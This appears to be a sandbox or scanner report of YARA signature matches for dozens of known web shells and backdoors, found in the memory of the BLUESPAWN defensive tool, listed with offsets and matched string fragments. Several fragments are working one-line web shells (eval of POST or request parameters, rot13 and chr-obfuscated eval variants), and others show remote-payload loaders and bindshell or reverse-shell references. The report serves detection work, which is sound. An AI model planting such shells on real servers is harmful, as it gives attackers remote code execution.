Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_r57shell127_r57_kartal_r57 | Web Shell - from files r57shell127.php, r57_kartal.php, r57.php | Florian Roth | - 0x2efa1e:$s2: $handle = @opendir($dir) or die("Can't open directory $dir");
- 0x2efa68:$s3: if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }
- 0x2efac1:$s5: if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_
- 0x34c4fb:$s5: if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_con2 | Web shells - generated from file con2.asp | Florian Roth | - 0x2efc66:$s7: ,htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => e
- 0x34c61c:$s7: ,htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => e
- 0x2efcc3:$s10: j "<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'><input n
- 0x34c670:$s10: j "<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'><input n
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_make2 | Web shells - generated from file make2.php | Florian Roth | - 0x2efe67:$s1: error_reporting(0);session_start();header("Content-type:text/html;charset=utf-8
- 0x34c790:$s1: error_reporting(0);session_start();header("Content-type:text/html;charset=utf-8
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_aaa | Web shells - generated from file aaa.asp | Florian Roth | - 0x2f0009:$s0: Function fvm(jwv):If jwv=""Then:fvm=jwv:Exit Function:End If:Dim tt,sru:tt="
- 0x34c8ae:$s0: Function fvm(jwv):If jwv=""Then:fvm=jwv:Exit Function:End If:Dim tt,sru:tt="
- 0x2f0062:$s5: <option value=""DROP TABLE [jnc];exec mast"&kvp&"er..xp_regwrite 'HKEY_LOCAL
- 0x34c8fd:$s5: <option value=""DROP TABLE [jnc];exec mast"&kvp&"er..xp_regwrite 'HKEY_LOCAL
- 0x2f00bb:$s17: if qpv="" then qpv="x:\Program Files\MySQL\MySQL Server 5.0\my.ini"&br&
- 0x34c94d:$s17: if qpv="" then qpv="x:\Program Files\MySQL\MySQL Server 5.0\my.ini"&br&
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_Expdoor_com_ASP | Web shells - generated from file Expdoor.com ASP.asp | Florian Roth | - 0x2f025f:$s4: ">www.Expdoor.com</a>
- 0x2f0281:$s5: <input name="FileName" type="text" value="Asp_ver.Asp" size="20" max
- 0x34ca85:$s5: <input name="FileName" type="text" value="Asp_ver.Asp" size="20" max
- 0x2f02d6:$s10: set file=fs.OpenTextFile(server.MapPath(FileName),8,True) '
- 0x2f031f:$s14: set fs=server.CreateObject("Scripting.FileSystemObject") '
- 0x2f0368:$s16: <TITLE>Expdoor.com ASP
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_php2 | Web shells - generated from file php2.php | Florian Roth | - 0x2f04d3:$s0: <?php $s=@$_GET[2];if(md5($s.$s)==
- 0x34cc38:$s0: <?php $s=@$_GET[2];if(md5($s.$s)==
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_bypass_iisuser_p | Web shells - generated from file bypass-iisuser-p.asp | Florian Roth | - 0x2f0654:$s0: <%Eval(Request(chr(112))):Set fso=CreateObject
- 0x34cd35:$s0: <%Eval(Request(chr(112))):Set fso=CreateObject
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_sig_404super | Web shells - generated from file 404super.php | Florian Roth | - 0x2f07d5:$s4: $i = pack('c*', 0x70, 0x61, 99, 107);
- 0x2f0807:$s6: 'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),
- 0x2f0860:$s7: //http://require.duapp.com/session.php
- 0x2f0893:$s8: if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}
- 0x2f08ea:$s12: //define('pass','123456');
- 0x2f0911:$s13: $GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSIO
- 0x34cf3e:$s13: $GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSIO
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_JSP | Web shells - generated from file JSP.jsp | Florian Roth | - 0x2f0ab4:$s1: void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i
- 0x34d05d:$s1: void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i
- 0x2f0b11:$s5: bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.app
- 0x34d0b0:$s5: bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.app
- 0x2f0b6a:$s11: if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequest
- 0x34d100:$s11: if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequest
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshell_123 | Web shells - generated from file webshell-123.php | Florian Roth | - 0x2f0d0f:$s0: // Web Shell!!
- 0x2f0d2a:$s1: @preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6
- 0x34d232:$s1: @preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6
- 0x2f0d79:$s3: $default_charset = "UTF-8";
- 0x2f0da1:$s4: // url:http://www.weigongkai.com/shell/
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_dev_core | Web shells - generated from file dev_core.php | Florian Roth | - 0x2f0f17:$s1: if (strpos($_SERVER['HTTP_USER_AGENT'], 'EBSD') == false) {
- 0x2f0f5f:$s9: setcookie('key', $_POST['pwd'], time() + 3600 * 24 * 30);
- 0x2f0fa5:$s10: $_SESSION['code'] = _REQUEST(sprintf("%s?%s",pack("H*",'6874
- 0x34d402:$s10: $_SESSION['code'] = _REQUEST(sprintf("%s?%s",pack("H*",'6874
- 0x2f0fee:$s11: if (preg_match("/^HTTP\/\d\.\d\s([\d]+)\s.*$/", $status, $matches))
- 0x34d442:$s11: if (preg_match("/^HTTP\/\d\.\d\s([\d]+)\s.*$/", $status, $matches))
- 0x2f103e:$s12: eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_C
- 0x34d489:$s12: eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_C
- 0x2f108f:$s15: if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))
- 0x34d4d1:$s15: if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_pHp | Web shells - generated from file pHp.php | Florian Roth | - 0x2f122e:$s0: if(is_readable($path)) antivirus($path.'/',$exs,$matches);
- 0x2f1275:$s1: '/(eval|assert|include|require|include\_once|require\_once|array\_map|arr
- 0x34d629:$s1: '/(eval|assert|include|require|include\_once|require\_once|array\_map|arr
- 0x2f12cb:$s13: '/(exec|shell\_exec|system|passthru)+\s*\(\s*\$\_(\w+)\[(.*)\]\s*
- 0x34d676:$s13: '/(exec|shell\_exec|system|passthru)+\s*\(\s*\$\_(\w+)\[(.*)\]\s*
- 0x2f1319:$s14: '/(include|require|include\_once|require\_once)+\s*\(\s*[\'|\"](\w+
- 0x34d6bb:$s14: '/(include|require|include\_once|require\_once)+\s*\(\s*[\'|\"](\w+
- 0x2f1369:$s19: '/\$\_(\w+)(.*)(eval|assert|include|require|include\_once|require\_once
- 0x34d702:$s19: '/\$\_(\w+)(.*)(eval|assert|include|require|include\_once|require\_once
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_pppp | Web shells - generated from file pppp.php | Florian Roth | - 0x2f1505:$s0: Mail: chinese@hackermail.com
- 0x2f152e:$s3: if($_GET["hackers"]=="2b"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo
- 0x34d839:$s3: if($_GET["hackers"]=="2b"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo
- 0x2f1587:$s6: Site: http://blog.weili.me
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_code | Web shells - generated from file code.php | Florian Roth | - 0x2f16f6:$s1: <a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_fi
- 0x34d973:$s1: <a class="high2" href="javascript:;;;" name="action=show&dir=$_ipage_fi
- 0x2f174a:$s7: $file = !empty($_POST["dir"]) ? urldecode(self::convert_to_utf8(rtrim($_PO
- 0x34d9bd:$s7: $file = !empty($_POST["dir"]) ? urldecode(self::convert_to_utf8(rtrim($_PO
- 0x2f17a1:$s10: if (true==@move_uploaded_file($_FILES['userfile']['tmp_name'],self::convert_
- 0x34da0b:$s10: if (true==@move_uploaded_file($_FILES['userfile']['tmp_name'],self::convert_
- 0x2f17fa:$s14: Processed in <span id="runtime"></span> second(s) {gzip} usage:
- 0x34da5b:$s14: Processed in <span id="runtime"></span> second(s) {gzip} usage:
- 0x2f1846:$s17: <a href="javascript:;;;" name="{return_link}" onclick="fileperm
- 0x34da9e:$s17: <a href="javascript:;;;" name="{return_link}" onclick="fileperm
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_jspyyy | Web shells - generated from file jspyyy.jsp | Florian Roth | - 0x2f19de:$s0: <%@page import="java.io.*"%><%if(request.getParameter("f")
- 0x34dbb2:$s0: <%@page import="java.io.*"%><%if(request.getParameter("f")
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_xxxx | Web shells - generated from file xxxx.php | Florian Roth | - 0x2f1b6d:$s0: <?php eval($_POST[1]);?>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_JJjsp3 | Web shells - generated from file JJjsp3.jsp | Florian Roth | - 0x2f1ce0:$s0: <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!S
- 0x34ddac:$s0: <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!S
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_PHP1 | Web shells - generated from file PHP1.php | Florian Roth | - 0x2f1e83:$s0: <[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?>
- 0x2f1ed6:$s2: :https://forum.90sec.org/forum.php?mod=viewthread&tid=7316
- 0x2f1f1d:$s3: @preg_replace("/f/e",$_GET['u'],"fengjiao");
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_JJJsp2 | Web shells - generated from file JJJsp2.jsp | Florian Roth | - 0x2f20a3:$s2: QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z
- 0x34e053:$s2: QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z
- 0x2f20fc:$s8: sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ
- 0x34e0a2:$s8: sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ
- 0x2f2150:$s10: ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData()
- 0x34e0ed:$s10: ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData()
- 0x2f2197:$s11: return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase(
- 0x34e12b:$s11: return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase(
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_radhat | Web shells - generated from file radhat.asp | Florian Roth | - 0x2f233e:$s1: sod=Array("D","7","S
- 0x34e24e:$s1: sod=Array("D","7","S
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_asp1 | Web shells - generated from file asp1.asp | Florian Roth | - 0x2f24a7:$s0: http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave
- 0x2f24e7:$s2: <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_php6 | Web shells - generated from file php6.php | Florian Roth | - 0x2f2672:$s1: array_map("asx73ert",(ar
- 0x34e470:$s1: array_map("asx73ert",(ar
- 0x2f2697:$s3: preg_replace("/[errorpage]/e",$page,"saft");
- 0x2f26d0:$s4: shell.php?qid=zxexp
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_xxx | Web shells - generated from file xxx.php | Florian Roth | - 0x2f2838:$s3: <?php array_map("ass\x65rt",(array)$_REQUEST['expdoor']);?>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_GetPostpHp | Web shells - generated from file GetPostpHp.php | Florian Roth | - 0x2f29c6:$s0: <?php eval(str_rot13('riny($_CBFG[cntr]);'));?>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_php5 | Web shells - generated from file php5.php | Florian Roth | - 0x2f2b4a:$s0: <?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_u
- 0x34e7a8:$s0: <?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_u
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_PHP | Web shells - generated from file PHP.php | Florian Roth | - 0x2f2ced:$s1: echo "<font color=blue>Error!</font>";
- 0x2f2d20:$s2: <input type="text" size=61 name="f" value='<?php echo $_SERVER["SCRIPT_FILE
- 0x34e8f0:$s2: <input type="text" size=61 name="f" value='<?php echo $_SERVER["SCRIPT_FILE
- 0x2f2d78:$s5: - ExpDoor.com</title>
- 0x2f2d9b:$s10: $f=fopen($_POST["f"],"w");
- 0x2f2dc2:$s12: <textarea name="c" cols=60 rows=15></textarea><br>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | webshell_webshells_new_Asp | Web shells - generated from file Asp.asp | Florian Roth | - 0x2f2f47:$s1: Execute MorfiCoder(")/*/z/*/(tseuqer lave")
- 0x2f2f7f:$s2: Function MorfiCoder(Code)
- 0x2f2fa5:$s3: MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | perlbot_pl | Semi-Auto-generated - file perlbot.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f30e2:$s0: my @adms=("Kelserific","Puna","nod32")
- 0x34ebaa:$s0: my @adms=("Kelserific","Puna","nod32")
- 0x2f3115:$s1: #Acesso a Shel - 1 ON 0 OFF
- 0x34ebd3:$s1: #Acesso a Shel - 1 ON 0 OFF
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | php_backdoor_php | Semi-Auto-generated - file php-backdoor.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f3234:$s0: http://michaeldaw.org 2006
- 0x308ed3:$s0: http://michaeldaw.org 2006
- 0x309818:$s0: http://michaeldaw.org 2006
- 0x34ec9e:$s0: http://michaeldaw.org 2006
- 0x35ef68:$s0: http://michaeldaw.org 2006
- 0x35f63d:$s0: http://michaeldaw.org 2006
- 0x2f325d:$s1: or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
- 0x34ecbd:$s1: or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
- 0x2f32ad:$s3: coded by z0mbie
- 0x306d0e:$s3: coded by z0mbie
- 0x34ed03:$s3: coded by z0mbie
- 0x35d5c5:$s3: coded by z0mbie
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php | Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f341e:$s0: <option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</opt
- 0x34ee20:$s0: <option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</opt
- 0x2ddb48:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x2f3349:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x2f3479:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x306951:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x306ac5:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x340617:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x34ed78:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x34ee71:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x35d2ed:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x35d406:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
- 0x2f34b9:$s2: echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>";
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Nshell__1__php_php | Semi-Auto-generated - file Nshell (1).php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f35fd:$s0: echo "Command : <INPUT TYPE=text NAME=cmd value=".@stripslashes(htmlentities($
- 0x34ef97:$s0: echo "Command : <INPUT TYPE=text NAME=cmd value=".@stripslashes(htmlentities($
- 0x2f3658:$s1: if(!$whoami)$whoami=exec("whoami"); echo "whoami :".$whoami."<br>";
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | shankar_php_php | Semi-Auto-generated - file shankar.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f37b2:$sAuthor: ShAnKaR
- 0x30bbf2:$sAuthor: ShAnKaR
- 0x30bc4f:$sAuthor: ShAnKaR
- 0x34f0de:$sAuthor: ShAnKaR
- 0x361181:$sAuthor: ShAnKaR
- 0x3611c4:$sAuthor: ShAnKaR
- 0x2f37c6:$s0: <input type=checkbox name='dd' ".(isset($_POST['dd'])?'checked':'').">DB<input
- 0x34f0e8:$s0: <input type=checkbox name='dd' ".(isset($_POST['dd'])?'checked':'').">DB<input
- 0x2f3821:$s3: Show<input type=text size=5 value=".((isset($_POST['br_st']) && isset($_POST['b
- 0x34f139:$s3: Show<input type=text size=5 value=".((isset($_POST['br_st']) && isset($_POST['b
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Casus15_php_php | Semi-Auto-generated - file Casus15.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f3972:$s0: copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_na
- 0x34f236:$s0: copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_na
- 0x2f39cc:$s2: echo "<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'
- 0x34f286:$s2: echo "<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'
- 0x2f3a28:$s3: value='Calistirmak istediginiz
- 0x34f2d8:$s3: value='Calistirmak istediginiz
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | small_php_php | Semi-Auto-generated - file small.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2e080b:$s1: $pass='abcdef1234567890abcdef1234567890';
- 0x2f3b45:$s1: $pass='abcdef1234567890abcdef1234567890';
- 0x2f3b7b:$s2: eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1
- 0x34f3cd:$s2: eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1
- 0x2e07e3:$s4: @ini_set('error_log',NULL);
- 0x2f3bd8:$s4: @ini_set('error_log',NULL);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | shellbot_pl | Semi-Auto-generated - file shellbot.pl.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f3ced:$s0: ShellBOT
- 0x34f4e1:$s0: ShellBOT
- 0x2f3d02:$s1: PacktsGr0up
- 0x34f4ec:$s1: PacktsGr0up
- 0x2f3d1a:$s2: CoRpOrAtIoN
- 0x34f4fa:$s2: CoRpOrAtIoN
- 0x2f3d32:$s3: # Servidor de irc que vai ser usado
- 0x34f508:$s3: # Servidor de irc que vai ser usado
- 0x2f3d63:$s4: /^ctcpflood\s+(\d+)\s+(\S+)
- 0x34f52f:$s4: /^ctcpflood\s+(\d+)\s+(\S+)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | fuckphpshell_php | Semi-Auto-generated - file fuckphpshell.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f3e82:$s0: $succ = "Warning!
- 0x34f5fa:$s0: $succ = "Warning!
- 0x2f3ea1:$s1: Don`t be stupid .. this is a priv3 server, so take extra care!
- 0x34f60f:$s1: Don`t be stupid .. this is a priv3 server, so take extra care!
- 0x2f3eec:$s2: \*=-- MEMBERS AREA --=*/
- 0x34f650:$s2: \*=-- MEMBERS AREA --=*/
- 0x2f3f11:$s3: preg_match('/(\n[^\n]*){' . $cache_lines . '}$/', $_SESSION['o
- 0x34f66b:$s3: preg_match('/(\n[^\n]*){' . $cache_lines . '}$/', $_SESSION['o
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ngh_php_php | Semi-Auto-generated - file ngh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f4049:$s0: Cr4sh_aka_RKL
- 0x307596:$s0: Cr4sh_aka_RKL
- 0x34f74f:$s0: Cr4sh_aka_RKL
- 0x35dc78:$s0: Cr4sh_aka_RKL
- 0x2f4063:$s1: NGH edition
- 0x3075ab:$s1: NGH edition
- 0x34f75f:$s1: NGH edition
- 0x35dc8d:$s1: NGH edition
- 0x2f407b:$s2: /* connectback-backdoor on perl
- 0x34f76d:$s2: /* connectback-backdoor on perl
- 0x2f40a7:$s3: <form action=<?=$script?>?act=bindshell method=POST>
- 0x3075c9:$s3: <form action=<?=$script?>?act=bindshell method=POST>
- 0x34f78f:$s3: <form action=<?=$script?>?act=bindshell method=POST>
- 0x35dca1:$s3: <form action=<?=$script?>?act=bindshell method=POST>
- 0x2f40e8:$s4: $logo = "R0lGODlhMAAwAOYAAAAAAP////r
- 0x34f7c6:$s4: $logo = "R0lGODlhMAAwAOYAAAAAAP////r
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | jsp_reverse_jsp | Semi-Auto-generated - file jsp-reverse.jsp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f420e:$s0: // backdoor.jsp
- 0x34f898:$s0: // backdoor.jsp
- 0x2f422a:$s1: JSP Backdoor Reverse Shell
- 0x34f8aa:$s1: JSP Backdoor Reverse Shell
- 0x2f3234:$s2: http://michaeldaw.org
- 0x2f4251:$s2: http://michaeldaw.org
- 0x2f736e:$s2: http://michaeldaw.org
- 0x308ea4:$s2: http://michaeldaw.org
- 0x308ed3:$s2: http://michaeldaw.org
- 0x3097e9:$s2: http://michaeldaw.org
- 0x309818:$s2: http://michaeldaw.org
- 0x34ec9e:$s2: http://michaeldaw.org
- 0x34f8c7:$s2: http://michaeldaw.org
- 0x351daa:$s2: http://michaeldaw.org
- 0x35ef43:$s2: http://michaeldaw.org
- 0x35ef68:$s2: http://michaeldaw.org
- 0x35f618:$s2: http://michaeldaw.org
- 0x35f63d:$s2: http://michaeldaw.org
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Tool_asp | Semi-Auto-generated - file Tool.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f435a:$s0: mailto:rhfactor@antisocial.com
- 0x34f97c:$s0: mailto:rhfactor@antisocial.com
- 0x2f4385:$s2: ?raiz=root
- 0x34f99d:$s2: ?raiz=root
- 0x2f439c:$s3: DIGO CORROMPIDO<BR>CORRUPT CODE
- 0x34f9aa:$s3: DIGO CORROMPIDO<BR>CORRUPT CODE
- 0x2f43c8:$s4: key = "5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA0
- 0x34f9cc:$s4: key = "5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA0
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | NT_Addy_asp | Semi-Auto-generated - file NT Addy.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f4511:$s0: NTDaddy v1.9 by obzerve of fux0r inc
- 0x34fac1:$s0: NTDaddy v1.9 by obzerve of fux0r inc
- 0x2f4542:$s2: <ERROR: THIS IS NOT A TEXT FILE>
- 0x309434:$s2: <ERROR: THIS IS NOT A TEXT FILE>
- 0x34fae8:$s2: <ERROR: THIS IS NOT A TEXT FILE>
- 0x35f36d:$s2: <ERROR: THIS IS NOT A TEXT FILE>
- 0x2f456f:$s4: RAW D.O.S. COMMAND INTERFACE
- 0x34fb0b:$s4: RAW D.O.S. COMMAND INTERFACE
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SimAttacker___Vrsion_1_0_0___priv8_4_My_friend_php | Semi-Auto-generated - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f46d3:$s0: SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend
- 0x34fc1b:$s0: SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend
- 0x2d5754:$s3: fputs ($fp ,"\n*********************************************\nWelcome T0 Sim
- 0x2f4710:$s3: fputs ($fp ,"\n*********************************************\nWelcome T0 Sim
- 0x34fc4e:$s3: fputs ($fp ,"\n*********************************************\nWelcome T0 Sim
- 0x2f476a:$s4: echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora
- 0x34fc9e:$s4: echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | RemExp_asp | Semi-Auto-generated - file RemExp.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f48b1:$s0: <title>Remote Explorer</title>
- 0x34fd91:$s0: <title>Remote Explorer</title>
- 0x2f48dc:$s3: FSO.CopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFi
- 0x34fdb2:$s3: FSO.CopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFi
- 0x2f4936:$s4: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x3040ca:$s4: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x31904d:$s4: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x34fe02:$s4: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x35b3d0:$s4: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
- 0x36a8d0:$s4: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | phvayvv_php_php | Semi-Auto-generated - file phvayvv.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f4a83:$s0: {mkdir("$dizin/$duzenx2",777)
- 0x34fefb:$s0: {mkdir("$dizin/$duzenx2",777)
- 0x2f4aad:$s1: $baglan=fopen($duzkaydet,'w');
- 0x34ff1b:$s1: $baglan=fopen($duzkaydet,'w');
- 0x2f4ad8:$s2: PHVayv 1.0
- 0x34ff3c:$s2: PHVayv 1.0
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | klasvayv_asp | Semi-Auto-generated - file klasvayv.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f4bde:$s1: set aktifklas=request.querystring("aktifklas")
- 0x34ffee:$s1: set aktifklas=request.querystring("aktifklas")
- 0x2f4c19:$s2: action="klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>
- 0x35001f:$s2: action="klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>
- 0x2f4c72:$s3: <font color="#858585">www.aventgrup.net
- 0x35006e:$s3: <font color="#858585">www.aventgrup.net
- 0x2f4ca6:$s4: style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT
- 0x350098:$s4: style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | rst_sql_php_php | Semi-Auto-generated - file rst_sql.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f4f90:$s0: C:\tmp\dump_
